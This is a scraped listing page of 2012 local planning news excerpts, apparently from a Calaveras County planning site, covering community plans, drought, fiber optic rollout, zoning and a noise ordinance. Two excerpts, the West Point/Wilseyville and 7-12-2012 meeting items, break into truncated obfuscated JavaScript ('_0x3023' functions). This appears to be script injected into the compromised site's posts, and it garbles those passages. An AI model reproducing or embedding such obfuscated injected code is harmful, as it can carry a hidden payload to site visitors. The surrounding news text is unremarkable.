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Rural communities still have to fight off extremists

The article below is from High Country News ( ).  Thank you to the “Friday Planning News” folks  for this article. Op-Ed – July 06, 2012 by Gina Knudson The fiery rhetoric that periodically consumes rural communities in the West is smoldering again. Some environmentalists berate those of us who try to collaborate to solve contentious public-lands issues;... Read More

Is Suburban Sprawl Worsening Americas Historic Drought

20 July 2012 – 6:00am As the U.S. experiences its worst drought in over half a century, Kaid Benfield questions the connection with the country’s suburban growth patterns over that same period. With 55% of the U.S. in moderate-to-severe drought, and the situation predicted to only get worse, Kaid Benfield, of the NRDC’s Switchboard blog, analyzes sprawl’s role in worsening drought and whether smart... Read More

West Point & Wilseyville Community Plans on the Agenda

Planning Staff will present a study session on the proposed Community Plans for West Point and Wilseyville at the July 26th Planning Commission Meeting.  Interested parties are encouraged to attend and share your thoughts. The Planning Commission agenda and meeting materials are available here. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return... Read More

Fiber optics arrive

By Joel Metzger | Posted: Tuesday, July 10, 2012 9:46 am Faster speeds ahead on the Internet superhighway Calaveras County residents will be moving a lot faster, at least when it comes to using the Internet, once the installation of a fiber optic cable is completed next year. Over the past few weeks, most county residents have seen giant spinning blades carve trenches in country roadways making space for bright orange conduit to be laid deep... Read More

New Burson Subdivision Seeks Public Comment

The Calaveras Enterprise July 6, 2012 A salamander listed as a threatened endangered species has been found on the site of a planned Burson subdivision. The California tiger salamander was placed on the California statewide endangered species list in 2010. Juan San Bartolome, who is developing a 15-lot, 109-acre site north of Highway 12, is working with the Fish and Wildlife Service to create a protected habitat for the salamander. Bartolome designed... Read More

Board of Supervisors to Consider Noise Ordinance

Public Notices | COUNTY LEGALS NOTICE OF PUBLIC HEARING LEAD AGENCY: Calaveras County Planning Department 891 Mountain Ranch Rd. San Andreas, CA 95249 2012-022 COUNTY INITIATED AMENDMENT TO TITLE 9 PUBLIC PEACE, MORALS AND WELFARE OF THE CALAVERAS COUNTY CODE FOR THE INCLUSION OF CHAPTER 9.02 NOISE CONTROL: The County proposes to amend Title 9 to add Chapter 9.02 Noise Control to the Public Peace, Morals, and Welfare section of the County... Read More

Planning Commission Meeting 7-12-2012

This Thursday’s Planning Commission Meeting will feature a Study Session on the proposed Glencoe and Rail Road Flat Land Use Maps. You can download the agenda, packet and associated memos here.  If you live in or own property in Glencoe or Rail Road Flat, you’ll want to attend this meeting to share your thoughts. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let... Read More

Don Pedro Zoning Change Approved

Don Pedro zoning change wins Written by Union Democrat staff June 21, 2012 12:14 pm The Tuolumne County Board of Supervisors this week approved, over neighbors’ objections, a zoning change for a 10-acre property near Lake Don Pedro that will allow the owners to keep two more housing units on-site than previously allowed. The Kanaka Creek Estates property, owned by Ruth and Larry Matteson, has long been under zoning restrictions that only allow... Read More

Festival riles neighbors, Lode officials

By Dana M. Nichols Record Staff Writer June 24, 2012 12:00 AM SAN ANDREAS – Calaveras County officials are mulling how to regulate things that go bump in the night. Or whomp. A recent dustup over noise involves Wood Whomp, a music and art festival held in Mountain Ranch. Calaveras County officials say they denied the festival’s request for a permit but organizers held it anyway, prompting thousands of dollars in costs to taxpayers as sheriff’s... Read More

High Speed Communication System Eyed

High-speed communication system eyed by Alex George Aerospace Corp. and Calaveras County officials are discussing constructing a high-speed broadband communications system in the county that could assist emergency crews and prop up the local economy. “There are lots of reasons to have broadband capabilities, especially from a business, economic and law enforcement standpoint,” said Supervisor Steve Wilensky, who along with county Assistant Chief... Read More

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